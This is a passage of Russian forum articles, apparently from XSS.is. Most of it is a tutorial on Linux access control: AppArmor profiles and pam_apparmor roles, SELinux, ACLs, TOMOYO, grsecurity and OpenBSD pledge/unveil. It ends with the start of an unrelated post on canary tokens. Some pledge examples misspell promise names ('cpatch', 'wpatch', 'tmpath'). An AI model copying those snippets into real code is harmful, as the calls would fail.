Это не один профиль, а набор профилей, системных файлов и связанных с ними скриптов. Вместе эти элементы работают как единое целое, ограничивая систему, начиная с "init". Ограничения включают: процесс инициализации SystemD и все порождаемые им дочерние процессы, "apt", используя оболочку с именем "rapt", а также блокировку файлов и каталогов, которые могут представлять значительный риск для безопасности.

Установка в Debian (при условии, что репозиторий включен в соответствии с примером, приведенным в разделе "Профили Whonix/Kicksecure")

Bash:Copy to clipboard

sudo apt install apparmor-profile-everything

Примечание: "apparmor-profile-everything" все еще находится в стадии разработки и тестирования. Хотя он уже может предотвратить запуск некоторых вредоносных программ, по умолчанию он пока не блокирует опасные модификации файлов.

"initramfs" информируется через хук, так что профиль "init-systemd" выполняется непосредственно перед запуском SystemD. Хук "initramfs-tools" достаточно прост для понимания. Его назначение убедиться в том, что "initramfs" знает, как запустить "init-systemd".

Он также содержит оболочку для ограничения "apt", поскольку "apt" требует прав доступа, которыми можно злоупотреблять для обхода ограничений. При обновлении или установке приложений необходимо использовать команду "rapt" вместо "apt" или "apt-get". Утилита "rapt" полностью ограничивает "apt", допуская при этом нормальное использование.

APPARMOR ДЛЯ УПРАВЛЕНИЯ ДОСТУПОМ НА ОСНОВЕ РОЛЕЙ (RBAC)

Для реализации RBAC в AppArmor используется PAM модуль "pam_apparmor", который прикрепляет профили к пользователям. Он может быть очень гибко интегрирован в любое приложение с поддержкой PAM с помощью соответствующего конфигурационного файла "/etc/pam.d/". Этот модуль был создан для поддержки нескольких различных сценариев использования, включая управление доступом на основе ролей (RBAC) и многоуровневый стиль безопасности (MLS). Например, AppArmor можно использовать, когда пользователи объединены в различные группы, такие как сотрудники или администраторы. Предоставляя общие привилегии в ролях, доступных всем службам (например, sshd, sudo, smbd и т.д.) , можно легко ограничить пользователей только теми привилегиями, которые необходимы для их работы. Это означает, что ограниченные среды могут включать любые программы с любой конфигурацией, и можно быть уверенным, что пользователи будут иметь только те привилегии, которые явно предоставлены им в конфигурационном файле.

Идея проста: когда кто-то использует двоичный файл с ограниченным доступом, этот двоичный файл попадает в роль AppArmor через PAM. Профиль AppArmor применяется к исполняемой программе, если программе нужны другие права доступа, она может сменить "hat" (т.е. роль) через "change_hat" на другую роль, также известную как подпрофиль. Этот модуль PAM также позволяет ограничить аутентифицированных пользователей подпрофилями на основе имен групп, имен пользователей или профиля по умолчанию. Для этого "pam_apparmor" должен быть установлен как сеансовый PAM модуль. Таким образом, если, например, "su" настроен на использование с "pam_apparmor", то при вызове пользователем "su" вызывается PAM, и когда начинается сессия PAM, "pam_apparmor" использует "change_hat" для изменения роли на ту, которая соответствует имени пользователя или соответствует основной группе, или на роль по умолчанию, которая обычно обеспечивает элементарную политику, и объявляет о переходе на роль профиля при запуске оболочки пользователя.

"pam_apparmor" использует API "change_hat", который ограничивает его использование следующими условиями: приложение, вызывающее API, должно быть ограничено, а все политики выполняются с ролями ограниченного профиля. Это означает, что каждая программа авторизации, поддерживающая PAM (gdm, getty, ssh и т.д.) , может быть настроена индивидуально. Это делается путем назначения отдельного профиля для каждой службы.

НАСТРОЙКА

Сначала нам необходимо установить модуль PAM:

Bash:Copy to clipboard

sudo apt install libpam-apparmor

Чтобы добавить поддержку "pam_apparmor" в приложение (которое поддерживает PAM) , необходимо добавить строку в конфигурационный файл PAM для приложения "/etc/pam.d/приложение":

Code:Copy to clipboard

session optional pam_apparmor.so

Если сделать "required" вместо "optional", то сессия завершится, если "pam_apparmor" не найдет "hat" (роль) для "change_hat". По умолчанию модуль попытается запустить роль по имени основной группы вошедшего пользователя. Если такой роли не существует, то модуль попытается изменить ее на ту, которая используется по умолчанию. Однако это можно настроить, добавив в PAM файл опцию, изменяющую порядок и атрибуты. Для этого добавим "order=", а затем список ролей, разделенных запятыми, которые стоит попробовать. Доступные типы ролей:

[+] "user" - в качестве имени роли будет использоваться имя пользователя;

[+] "group" - в качестве имени роли будет использоваться основная группа пользователя;

[+] "default" - в качестве роли будет использоваться "DEFAULT". Как правило, к этому следует прибегать в крайнем случае.

Порядок в списке определяет очередность попыток. Пример конфигурации:

Code:Copy to clipboard

session optional pam_apparmor.so order=group,default

Использовать только имя пользователя:

Code:Copy to clipboard

session optional pam_apparmor.so order=user

Использовать имя пользователя, затем имя основной группы, затем роль по умолчанию (DEFAULT) , если предыдущие роли не существуют в профиле приложения:

Code:Copy to clipboard

session optional pam_apparmor.so order=user,group,default

Также можно добавить флаг "debug" к строке сессии "pam_apparmor", что заставит модуль сообщать в системный журнал логов больше о том, что он пытается сделать.

В качестве примера интегрируем модуль "pam_apparmor" с "su", добавив в файл "/etc/pam.d/su" следующую строку:

Code:Copy to clipboard

session optional pam_apparmor.so order=user,group,default debug

КОНФИГУРАЦИЯ

Рассмотрим конфигурацию с использованием "change_hat", которая в дальнейшем может быть расширена для удовлетворения различных требований. В этом примере мы ограничим "su" таким образом, чтобы, когда пользователь использует его для выполнения команд от имени другого пользователя, AppArmor применял контроль доступа. Это можно использовать и с другими двоичными файлами, такими как "sshd" или "login". При настройке "pam_apparmor" лучше всего дополнительно войти в систему под именем Root в отдельном окне терминала, чтобы, если что-то пойдет не так, можно было использовать этот терминал для восстановления работоспособности.

Чтобы упростить управление и избежать путаницы, мы разобьем политику PAM на различные файлы. Для AppArmor не имеет значения, разбиты ли эти файлы на отдельные части или собраны в один монолитный файл. Мы будем использовать следующие файлы:

[+] "/etc/apparmor.d/pam_binaries" - будет содержать политики для двоичных файлов профилей, интегрированных с PAM (в нашем случае "su");

[+] "/etc/apparmor.d/pam_roles" - политики для различных ролей в нашей системе, на которые мы будем ссылаться в "pam/mappings";

**[+] "/etc/apparmor.d/pam/mappings" **- необходим для сопоставления имен пользователей или групп с ролями.

Создадим файл "/etc/apparmor.d/pam_binaries", чтобы иметь:

Code:Copy to clipboard

#include <tunables/global> /bin/su { #include <abstractions/authentication> #include <abstractions/base> #include <abstractions/nameservice> #include <pam/mappings> capability chown, capability setgid, capability setuid, owner /etc/environment r, owner /etc/shells r, owner /etc/default/locale r, owner @{HOMEDIRS}/*/.Xauthority rw, owner @{HOMEDIRS}/*/.Xauthority-c w, owner @{HOMEDIRS}/*/.Xauthority-l w, @{HOME}/.xauth* rw, owner @{PROC}/sys/kernel/ngroups_max r, /usr/bin/xauth rix, owner /var/run/utmp rwk, }

Этот файл будет содержать политику ограничения исполняемых файлов, использующих "libpam-apparmor", а также будет включать файл "pam/mappings" со всеми нашими сопоставлениями имен пользователей и групп с ролями. Затем создадим роли в файле "/etc/apparmor.d/pam_roles":

Code:Copy to clipboard

#include <tunables/global> profile default_user { #include <abstractions/base> #include <abstractions/bash> #include <abstractions/consoles> #include <abstractions/nameservice> deny capability sys_ptrace, owner /** rkl, @{PROC}/** r, /bin/** Pixmr, /usr/bin/** Pixmr, owner @{HOMEDIRS}/ w, owner @{HOMEDIRS}/** w, } profile confined_user { #include <abstractions/base> #include <abstractions/bash> #include <abstractions/consoles> #include <abstractions/nameservice> deny capability sys_ptrace, owner /** rwkl, @{PROC}/** r, /bin/** Pixmr, /usr/bin/** Pixmr, owner @{HOMEDIRS}/bin/** ixmr, }

Этот файл будет содержать роли, на которые ссылается "pam/mappings". Пользователь по умолчанию может читать и блокировать свои файлы в любом месте, но перезаписывать только в своем домашнем каталоге, и имеет ограниченные права на запуск файлов. Пользователь с ограниченными правами (confined_users) сможет читать, перезаписывать и блокировать свои файлы в любом месте, а также запускать их.

Теперь создадим файл "/etc/apparmor.d/pam/mappings" для сопоставления имени нашего пользователя (ivan) и группы администраторов (wheel) с ролями, а также назначим "DEFAULT":

Code:Copy to clipboard

^DEFAULT { #include <abstractions/authentication> #include <abstractions/nameservice> capability dac_override, capability setgid, capability setuid, /etc/default/su r, /etc/environment r, @{HOMEDIRS}/.xauth* w, /bin/{,b,d,rb}ash Px -> default_user, /bin/{c,k,tc}sh Px -> default_user, } ^ivan { #include <abstractions/authentication> #include <abstractions/nameservice> capability dac_override, capability setgid, capability setuid, /etc/default/su r, /etc/environment r, @{HOMEDIRS}/.xauth* w, /bin/{,b,d,rb}ash Px -> confined_user, /bin/{c,k,tc}sh Px -> confined_user, } ^wheel { #include <abstractions/authentication> #include <abstractions/nameservice> capability dac_override, capability setgid, capability setuid, /etc/default/su r, /etc/environment r, @{HOMEDIRS}/.xauth* w, /bin/{,b,d,rb}ash Ux, /bin/{c,k,tc}sh Ux, }

Этот файл будет содержать сопоставления пользователей с ролями для двоичных файлов, ограниченных AppArmor, сконфигурированных для использования с "libpam- apparmor". Пользователи, не имеющие сопоставлений, не смогут войти в систему. "DEFAULT" содержит права, необходимые только для перехода к оболочке входа пользователя в систему, все остальные права были перенесены в профиль "default_user". "ivan" содержит права, необходимые только для перехода в оболочку входа "ivan", все остальные права были перенесены в профиль "confined_user". "wheel" не будет ограничивать группу администраторов, если они не ограничены отдельным правилом, так как ограничения для администраторов должны настраиваться индивидуально в зависимости от требований и потребностей. Важно отметить, что если служба авторизации не ограничена, то будет применен профиль по умолчанию.

После настройки политики профили и роли должны быть перезагружены:

Bash:Copy to clipboard

sudo apparmor_parser -r -T -W /etc/apparmor.d/pam_binaries /etc/apparmor.d/pam_roles

Проверим, были ли они загружены:

Bash:Copy to clipboard

sudo aa-status 17 profiles are in enforce mode. /bin/su /bin/su//DEFAULT /bin/su//ivan /bin/su//wheel ... confined_user

Итак, рассмотрим, как это примерно работает:

[1] Пользователь запускает команду "su - ivan";

[2] Затем "su" выполняет "сhange_hat()" через "pam_apparmor" для "^ivan";

[3] После запуска оболочки "ivan" пользователь переходит в ограниченный профиль "confined_user".

Проще говоря, когда пользователь выполняет команду "su - ivan", он переходит в "confined_user".

Более детальная настройка производится индивидуально. Также возможно расширение списка двоичных файлов, такими как "sshd" и "login", для этого необходимо добавить запись "pam_apparmor.so", как в примере с "su", и политику для двоичного файла в "/etc/apparmor.d/pam_binaries". Чтобы добавить нового пользователя или роль, необходимо настроить "/etc/apparmor.d/pam_roles" для новой роли и скорректировать "/etc/apparmor.d/pam/mappings" для сопоставления имени входа в систему с ролью AppArmor.

УВЕДОМЛЕНИЯ APPARMOR

Демон уведомлений выводит на рабочий стол уведомления, когда AppArmor отказывает программе в доступе. Для начала необходимо запустить платформу аудирования AuditD, выполнив несколько команд (если это не было сделано ранее, следуя примеру из раздела "Создание профилей"):

Bash:Copy to clipboard

sudo apt install auditd sudo systemctl enable auditd sudo systemctl start auditd

Затем установим демон уведомлений AppArmor и необходимые модули на питоне:

Bash:Copy to clipboard

sudo apt install apparmor-notify python3-notify2 python3-psutil

После чего мы разрешим пользователю читать журналы аудита "/var/log/audit", добавив его в группу пользователей "audit" (где "ivan" имя пользователя):

Bash:Copy to clipboard

sudo groupadd -r audit sudo gpasswd -a ivan audit

После этого необходимо обозначить это, добавив строку в файл "/etc/audit/auditd.conf":

Code:Copy to clipboard

log_group = audit

Теперь создадим ярлык автозапуска для демона уведомлений AppArmor с помощью команд:

Code:Copy to clipboard

mkdir ~/.config/autostart touch ~/.config/autostart/apparmor-notify.desktop

В него следует внести стандартные параметры ярлыка и настроить команду, которая будет автоматически выполняться после запуска системы:

Code:Copy to clipboard

[Desktop Entry] Type=Application Name=AppArmor Notify TryExec=aa-notify Exec=aa-notify -p -s 1 -w 60 -f /var/log/audit/audit.log StartupNotify=false NoDisplay=true

Где содержимое после "Exec=" это команда запуска демона уведомлений AppArmor. Рассмотрим параметры для редактирования:

[+] "-p" - опрашивать журналы AppArmor и выводить уведомления на рабочий стол;

[+] "-s" - показывать сводку за определенное количество дней;

[+] "-w" - подождать определенное количество секунд перед отображением уведомлений;

[+] "-f" - путь к журналам AppArmor.

Готово, теперь необходимо перезагрузиться. Проверить, работает ли демон уведомлений, можно с помощью команды:

Bash:Copy to clipboard

pgrep -ax aa-notify

ОТКЛЮЧЕНИЕ APPARMOR

Если Apparmor больше не нужен, чтобы программа не расходовала системные ресурсы, или его просто нужно отключить для отладки. Очистим кэш профилей и остановим службу управления AppArmor:

Bash:Copy to clipboard

sudo systemctl disable apparmor sudo systemctl stop apparmor

Но эта команда не остановит уже запущенные профили, для их выгрузки необходимо выполнить:

Bash:Copy to clipboard

sudo aa-teardown

Чтобы просто отключить профиль, необходимо выполнить следующие команды (apparmor_parser -R или --remove) :

Bash:Copy to clipboard

sudo ln -s /etc/apparmor.d/профиль /etc/apparmor.d/disable/ sudo apparmor_parser -R /etc/apparmor.d/профиль

Для повторного включения соответствующего профиля безопасности необходимо выполнить следующие команды (apparmor_parser -r или --replace) :

Bash:Copy to clipboard

sudo rm /etc/apparmor.d/disable/профиль sudo apparmor_parser -r /etc/apparmor.d/профиль

После этого профиль должен отображаться в "aa-status" как работающий в режиме жалоб. При необходимости он может быть переведен в принудительный режим. Удаление профилей безопасности AppArmor функционально эквивалентно их отключению. Можно также полностью удалить связанный с ним файл из файловой системы. Если профиль был удален без предварительного удаления из ядра (с помощью команды "apparmor_parser -R"), то для очистки потерянных записей можно воспользоваться командой "aa-remove-unknown".

SELINUX

SELinux зародился в недрах АНБ и реализован на основе ролевого управления доступом (RBAC) , многоуровневой безопасности и принудительного назначения типов, что является центральной концепцией всего SELinux. Каждому файлу назначается контекст безопасности, определяющий, какие процессы и пользователи могут с ним работать. Как и AppArmor, SELinux является реализацией системы MAC, основанной на архитектуре модулей безопасности Linux. Несмотря на очень высокий уровень защиты и поддержку со стороны АНБ и RedHat, эта система не смогла завоевать широкую популярность из-за очень сложной процедуры настройки.

Пользователь в SELinux не эквивалентен пользователю Linux. При смене пользователя через "su" или "sudo" пользователь SELinux не меняется. Обычно несколько пользователей Linux являются одним пользователем SELinux, но возможно и сопоставление один к одному, как это сделано для Root. Пользователи могут иметь роль, одну или несколько. Например, непривилегированный пользователь или администратор базы данных. Объекты также могут иметь роль, и обычно это роль "object_r". Тип или домен является основным средством определения доступа, а также способом категоризации приложения или ресурса.

Классы объектов или категории объектов, такие как "dir" для каталогов или "file" для файлов, используются в политике для более точного определения типов разрешенного доступа. Каждый класс объектов содержит набор разрешений и определяет варианты доступа к объекту. Например, "file" содержит разрешения на создание (create) , чтение (read) , запись (write) и удаление (unlink) , а класс "unix_stream_socket object" имеет разрешения на создание (create) , установление соединения (connect) и отправку данных (sendto).

Также, как и в AppArmor, существует "permissive" (режим жалоб) , в котором приложениям разрешен доступ к ресурсам, но все обращения записываются в журнал логов. Это позволяет затем создать профиль для приложения. Разница заключается в том, что этот режим является общесистемным, в то время как в AppArmor он может быть выборочно включен для конкретных приложений.

Ключевое различие между AppArmor и SELinux заключается в том, что AppArmor привязывает политику к пути файла, в то время как SELinux опирается на дескриптор файла. Если заблокировать выполнение файла, а затем переместить его, AppArmor разрешит запуск файла, а SELinux нет. Если файл будет перезаписан по исходном пути, уже AppArmor заблокирует его, а SELinux разрешит выполнение. Избежать подобных недоразумений можно, включив политику "блокировать все, кроме явно разрешенного". В двух словах о различиях можно сказать, что разработчики SELinux делали упор не на простоту использования, а на безопасность.

Например, возьмем традиционные разрешения (-rwxr-xr-x) , предоставляемые файлам. В DAC они могут быть изменены пользователем. Однако в MAC администратор безопасности может заморозить разрешения для конкретного файла, сделав невозможным изменение этих разрешений для любого пользователя до тех пор, пока не будет изменена политика для этого файла. Это особенно полезно для процессов, которые могут быть скомпрометированы. При использовании DAC особенно велика вероятность того, что скомпрометированная программа, имеющая доступ к повышенным привилегиям, сможет нанести урон.

Как становится понятно из вышесказанного, настройка такой системы очень трудоемка и требует скрупулезности. Однако существует обширная база политик. Поэтому большинство типичных действий (например, разрешение самбе шарить домашние каталоги) можно выполнить с помощью нескольких простых команд.

СПИСКИ КОНТРОЛЯ ДОСТУПА (ACL)

Стандартный режим управления разрешениями в Linux покрывает большинство потребностей. ACL более сложный, но гибкий инструмент управления доступом. Он позволяет сегментировать категорию "other" и разрешить работу с файлом или каталогом нескольким конкретным пользователям и группам. В зависимости от целей администрирования, опция может применяться как к отдельной файловой системе, так и к данным SMB и NFS серверов.

Проще говоря, это расширенные инструменты для определения прав доступа к файлам и объектам. Они позволяют более детально определять права доступа к файлам, назначая различные привилегии любому пользователю или группе. Например, можно предоставить общий доступ к файлу только одному конкретному пользователю, независимо от того, в какой группе он находится. Это первый вариант системы мандатного управления, зависящий от возможностей файловой системы.

Например, если есть несколько пользователей или несколько служб, работающих под разными учетными записями, то неплохо бы разделить права доступа к файловой системе и сузить область поражения в случае чего. В каждом дистрибутиве используется так называемая избирательная система доступа. Например, возможность пользователя открыть тот или иной файл проверяется по списку ACL, какие галочки включены для данного пользователя.

В частности, в системах Linux используется пара механизмов предоставления доступа к файлам: либо каждый объект имеет три параметра доступа, т.е. для владельца, для группы пользователей, в которую входит владелец, и для всех остальных, либо каждый параметр может принимать комбинацию из трех значений, т.е. можно читать, можно изменять, можно запускать.

Сначала установим его:

Bash:Copy to clipboard

sudo apt install acl

Для работы файловая система должна быть смонтирована с опцией "acl", но есть вероятность, что она уже активна как одна из опций монтирования по умолчанию в файловой системе Btrfs или Ext4. Для проверки наличия этой опции можно использовать следующую команду (где "диск" это sda или sdb и т.д., а "0" цифра корневого раздела):

Bash:Copy to clipboard

sudo tune2fs -l /dev/диск0 | grep "Default mount options:" Default mount options: user_xattr acl

Если опция не активна, включим ее для корневого раздела с помощью команды:

Bash:Copy to clipboard

sudo mount -o remount,acl /

Рассмотрим практические примеры использования команды "setfacl" для управления правами доступа к файлам:

Bash:Copy to clipboard

sudo setfacl -R -m user:ivan:rx Documents sudo setfacl -m group:sys_adm:r /var/log/apt/ sudo setfacl -m user:guest:0 Passwords.kdbx

Первая команда устанавливает права на запуск и чтение для "ivan" в каталоге "Documents" и всем его содержимом. Вторая команда разрешает участникам группы "sys_adm" читать файлы журнала ошибок "apt". Третья команда полностью запрещает пользователю "guest" доступ к файлу "Passwords.kdbx".

ACL по умолчанию это записи управления доступом, которые наследуются всеми подэлементами каталога. Так, если необходимо создать каталог для нескольких пользователей, чтобы все могли работать с файлами друг друга, с необходимыми разрешениями для каждого:

Bash:Copy to clipboard

sudo setfacl -m user:guest1:rwx work_dir sudo setfacl -d -m user:guest1:rwx work_dir sudo setfacl -m user:guest2:rx work_dir sudo setfacl -d -m user:guest2:rx work_dir

Первая команда предоставляет пользователю "guest1" права на запись, чтение и выполнение, а "guest2" только на чтение и выполнение. Вторая команда устанавливает разрешения по умолчанию для этого каталога, которые будут наследоваться всем содержимым внутри него. Теперь при каждом создании файла он сохраняет своего первоначального владельца и группу, но ему автоматически присваиваются указанные выше разрешения ACL.

Для просмотра разрешений используем команду:

Bash:Copy to clipboard

getfacl файл/каталог

Для удаления всех записей ACL необходимо выполнить:

Bash:Copy to clipboard

sudo setfacl -b файл/каталог

Основная проблема ACL заключается в том, что они снижают производительность файловой системы. Кроме того, ACL может некорректно взаимодействовать с программами, которые его не поддерживают. Например, если измененные в соответствии с правилами текстового редактора данные сохраняются не в исходном файле, а в новом, то ACL права на этот файл могут быть потеряны. Однако следует отметить, что гибкость и дополнительные возможности помогают построить интеллектуальную модель управления правами доступа к файловой системе, если умело с ними работать.

ПАРУ СЛОВ ОБ ОСТАЛЬНЫХ: TOMOYO/AKARI

Еще несколько хороших реализаций MAC, с которыми может справиться каждый. TOMOYO и AKARI похожи на AppArmor, но менее распространены. AKARI это вариант реализации TOMOYO, и в настоящее время они являются одними из четырех стандартных модулей безопасности Linux, наряду с SELinux и AppArmor. Они могут сосуществовать с другими модулями безопасности, такими как SELinux и AppArmor. TOMOYO/AKARI ориентированы на поведение системы, позволяя каждому процессу назначать поведение и ресурсы, необходимые для достижения его цели. Они могут использоваться как средства системного анализа, и как средства разграничения доступа. Цель безопасности TOMOYO/AKARI предоставить MAC, удовлетворяющий практическим требованиям большинства пользователей и остающийся пригодным для использования. Им часто отдают предпочтение, поскольку они являются инструментами не только для специалистов, но и для обычных пользователей, относительно легко настраиваются и обеспечивают разнообразные варианты использования. По сути, они имеют тот же принцип работы, что и AppArmor, с обучающим режимом и аналогичными инструментами. Однако конфигурационные файлы менее структурированы, чем у AppArmor, и база данных профилей меньше.

Основные особенности включают:

**[+] **Системный анализ;

[+] Автоматическое создание политики;

[+] Простой синтаксис;

[+] Простота.

TOMOYO не предназначен для пользователей, которым нужны готовые файлы политик, предоставленные другими пользователями. Он предполагает создание политики с нуля в режиме обучения (подобно AppArmor) , который позволяет автоматически генерировать файлы политик с необходимыми и достаточными для конкретной системы разрешениями. TOMOYO сообщает о том, что происходит в системе, и поэтому может использоваться в качестве инструмента анализа системы. Он похож на "strace" и сообщает, что выполняет каждая программа и к каким файлам или сетям осуществляется доступ. Однако реализация этого инструмента требует преодоления большинства препятствий.

AKARI основан на ветке TOMOYO и реализован в виде загружаемого модуля ядра. Если проект TOMOYO используется исключительно для системного анализа, то AKARI является наиболее простым способом решения этой задачи. Если проект TOMOYO используется для системных ограничений, то AKARI это способ получить большую часть функциональности ветви TOMOYO с минимальными усилиями.

RBAC ОТ GRSECURITY

В RBAC от компании GRSecurity впервые реализована система профилирования, позволяющая автоматически генерировать полные системные политики с наименьшими привилегиями. Легко читаемые политики, правила и журналы внешне похожи на AppArmor. В журналах отображаются полные пути к процессу нарушителю и его родительскому процессу, а также в доступной форме описывается характер нарушения. Роли применяются к пользователям или группам. Эти роли содержат набор тем, описывающих политики для двоичных файлов и скриптов в системе. Темы содержат набор объектов, представляющих собой файлы, такие как утилиты, сетевые сокеты и ресурсы, которые разрешено использовать процессу. В сочетании с легко читаемыми политиками многие обнаруживают, что могут сразу же приступить к созданию значимых политик безопасности или выполнить полную системную настройку. GRSecurity поставляется в виде отдельных патчей, что позволяет использовать его совместно с SELinux.

В отличие от других систем управления доступом, он имеет конкретную цель ограничение доступа во всей системе. Поскольку он имеет конкретное назначение, то позволяет реализовать обязательный анализ политики, который выявляет ошибки администратора и не дает ему развернуть политику, создающую ложное ощущение безопасности. Любые ошибки, найденные в политике, описываются понятными для человека, содержательными объяснениями того, какие типы атак были бы возможны, если бы политика была разрешена к загрузке.

К сожалению, с 2017 года этот проект доступен только по лицензии. После перепрофилирования проекта были попытки создания его форков, но все они прекратили разработку.

PLEDGE И UNVEIL В OPENBSD

Pledge и Unveil упоминаются вместе, хотя могут использоваться независимо друг от друга. Pledge это системный вызов для ограничения разрешений программы. Unveil это также системный вызов, который скрывает для процесса всю файловую систему, за исключением открытых путей. Это очень эффективные и мощные средства защиты, но они требуют внесения некоторых изменений в исходный код программы, а поскольку это необходимо делать в исходном коде, то программа не работает в изолированной среде, из которой можно было бы выбраться.

Большинство базовых системных сервисов, используемых в OpenBSD, работают с использованием разделения привилегий. Каждая часть демона ограничена необходимым минимумом. Монолитный демон должен читать и записывать файлы, принимать сетевые соединения и отправлять сообщения журнала. Разделение демона на несколько частей обеспечивает более детальный контроль над каждым рабочим процессом, а использование системных вызовов Pledge и Unveil позволяет установить ограничения и значительно снизить урон в случае взлома.

PLEDGE

По своей сути Pledge похож на многие другие механизмы ограничения доступа к системным вызовам, такие как "seccomp", "capsicum" и "systrace", но, в отличие от них, он разработан с учетом максимальной простоты использования. Pledge требует наличия в приложениях специальных аннотаций, определяющих уровень привилегий на текущем этапе работы приложения. Вместо детализации на уровне отдельных системных вызовов Pledge манипулирует классами доступа. Аннотации раскрываются путем указания функции "pledge()", первым аргументом которой является список разрешенных классов системных вызовов, а вторым массив путей к файлам, доступ к которым разрешен. После сборки и запуска модифицированного приложения ядро берет на себя работу по контролю соблюдения заданных правил.

По сути, Pledge это обещание, что программа будет использовать только определенные ресурсы. Например, программа обязуется не использовать никаких портов, кроме "port 63", или программа обязуется не использовать никаких системных вызовов, кроме "lseek()" и "fork()". В этом случае вместо традиционной блокировки доступа к несанкционированным системным вызовам применяется иной подход, при котором в случае обнаружения несанкционированного поведения приложение принудительно завершается. По мнению разработчиков, такой подход значительно затрудняет исследование возможных путей обхода ограничений в ходе атаки.

Существует типичный сценарий использования системных вызовов: на этапе инициализации используется достаточно большое количество системных вызовов, после чего доступ к ним существенно сокращается. Обычно для обеспечения защиты достаточно добавить вызов "pledge()" в участок кода после инициализации, но до начала главного цикла. К классам системных вызовов относятся stdio (ввод/вывод) , rpath (только для чтения) , wpath (запись файлов) , cpath (создание файлов) , tmppath (работа с временными файлами) , inet (сетевые сокеты) , unix (сокеты unix) , dns (резолвинг в DNS) , getpw (доступ на чтение базы пользователей) , ioctl (вызов ioctl) , proc (управление процессами) , exec (запуск процессов) , id (управление правами доступа) и т.д.

Например, для программы "cat", которая только читает файлы, можно указать: pledge("stdio rpath", NULL), для "mkdir": pledge("stdio rpath cpatch wpatch fattr", NULL), а для "patch": pledge("stdio rpath cpatch wpatch tmpath fattr", NULL). Такие ограничения позволят работать с файлами, но не позволят создавать сокеты и запускать другие приложения. Насколько проще реализовать Pledge, можно судить по утилите "file", когда при использовании "systrace" для ограничения системных вызовов требуется 300 строк кода, а Pledge позволяет обойтись двумя вызовами "pledge()".

Рассмотрим, как это работает, например, есть условная программа, которой для системного вызова требуется только "read". В код программы добавляется правило "pledge()", чтобы использовать только "read" и ничего больше. Кто-то обнаружил, что в программе есть уязвимость, которая может быть использована для вызова оболочки Root. Использование программы для запуска оболчки Root приведет к тому, что ядро завершит процесс с сообщением "SIGABRT" (которое нельзя перехватить или проигнорировать) и сгенерирует журнал, который можно найти с помощью "dmesg".

Pledge обычно находится непосредственно в коде программы:

Code:Copy to clipboard

int pledge(const char *promises, const char *execpromises);

Пример кода "cat" из OpenBSD:

Code:Copy to clipboard

........ #include <unistd.h> ........ int ch; if (pledge("stdio rpath", NULL) == -1) err(1, "pledge"); while ((ch = getopt(argc, argv, "benstuv")) != -1) ..........

UNVEIL

Unveil дополняет механизм Pledge по ограничению доступа к системным вызовам. Он позволяет изолировать доступ к файловой системе, интегрируясь в код приложения. Суть защиты заключается в том, что первый вызов "unveil()" полностью блокирует доступ приложения ко всей файловой системе. После этого открывается выборочный доступ для некоторых путей, с которыми приложение может работать (по сути, это реализация белого списка, по умолчанию все запрещено, а необходимые пути должны быть явно разрешены).

Поддерживаются флаги ограничения доступа, т.е. можно открыть отдельно доступ на чтение, запись и выполнение, запретить создание или удаление файлов. Например, можно открыть доступ на запись к "/tmp", на запуск "/bin/sh" и доступ на чтение "/var/spool". Блокирование осуществляется за счет интеграции дополнительных фильтров, работающих на уровне системных вызовов, связанных с файловыми операциями ( "open()", "chmod()", "rename()" и т.д.).

Unveil работает почти так же, как Pledge, за исключением того, что передаются пути и разрешения для них:

Code:Copy to clipboard

int unveil(const char* путь, const char* разрешение);

" Путь" - может быть как файлом, так и каталогом. Если это каталог, то разрешения будут применяться к любому файлу в этом каталоге.** "Разрешение" **- это строка, содержащая ноль или:

**[+] "r" **- доступ на чтение;

[+] "w" - доступ на запись;

[+] "c" - создать или удалить;

[+] "x" - выполнить.

Как и в Pledge, права можно только уменьшать, но не увеличивать. Еще одно важное отличие заключается в том, что, в отличие от Pledge, попытка открыть файл, который не виден из-за Unveil, не приведет к завершению работы программы. Вместо этого попытка будет просто провалена. В качестве примера можно привести файл "/bin/man" из OpenBSD:

Code:Copy to clipboard

if (unveil("/usr/share/man", "r") < 0) { perror("unveil"); return 1; } unveil(nullptr, nullptr);

Эта программа заранее знает, что будет читать только файлы внутри "/usr/share/man". Второй вызов Unveil с нулем сообщает ядру, что мы закончили и больше не нужно указывать пути, после чего Unveil уже не может быть вызван.

ЗАКЛЮЧЕНИЕ

В заключение стоит повторить, что AppArmor отличается высокой степенью безопасности и гораздо проще в настройке, чем SELinux. А относительно простая реализация функции самостоятельного создания профилей только усиливает его преимущества, особенно когда речь идет о создании политик безопасности или переключении между разрешающим (permissive) и запрещающим (non-permissive) режимами. SELinux может переключать эти режимы только для всей системы, в то время как AppArmor делает это на уровне приложений. С другой стороны, выбор между этими двумя решениями может отсутствовать, поскольку некоторые основные дистрибутивы Linux поддерживают либо одно, либо другое решение. Конечно, они не спасут от выхода из песочницы браузера через ошибку в системном вызове с возможностью записи в адресное пространство ядра, но от вредоносных действий в пользовательском пространстве они могут помочь.

https://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/93544/

**©
Специально для **XSS.is
**Автор статьи:IvanVasilyevich**

Canary Tokens: Инструмент для Обнаружения Несанкционированных Действий

ID: 676533bbb4103b69df371a0b
Thread ID: 96827
Created: 2023-08-29T13:25:27+0000
Last Post: 2023-09-11T05:18:20+0000
Author: Fireman112
Prefix: Статья
Replies: 2 Views: 445

Вчера я посмотрел это ВИДЕО и подумал, что могу написать (генерировать) статью на эту тему, чтобы поделиться информацией со всеми вами.
Эта статья не представляет собой рекламу канала или веб-приложения, а предназначена исключительно для ознакомления.

Canary Tokens, или ловушки Canary, представляют собой мощный инструмент для обнаружения несанкционированных действий в цифровой среде. Они позволяют организациям и отдельным пользователям создавать и размещать маяки, которые реагируют на попытки несанкционированного доступа, интрузии или даже просто на попытки обратить внимание на фиктивные ресурсы. В этой статье мы рассмотрим, что такое Canary Tokens, как они работают и какие альтернативы существуют.

Что такое Canary Tokens?

Canary Tokens - это фиктивные или маркированные ресурсы, которые создаются с целью привлечения внимания злоумышленников и обнаружения их действий. Когда кто-то пытается получить доступ к Canary Token или взаимодействует с ним, это активирует систему уведомлений, предупреждая о нарушении безопасности.

Как работают Canary Tokens?

Создание Ловушки: Пользователь выбирает тип Canary Token в зависимости от целей. Это может быть URL-адрес, файл, адрес электронной почты и другие формы.

Настройка Параметров: Пользователь настраивает параметры ловушки, такие как имя, описание и внешний вид. Это может включать в себя создание поддельных файлов, подделку электронных сообщений, или создание поддельных веб-страниц.

Размещение Ловушки: Созданную ловушку размещают в цифровой среде, где предполагается возможное нарушение безопасности. Это может быть в электронной почте, на веб-сайте, в сетевом хранилище данных или в любом другом месте, которое требует мониторинга.

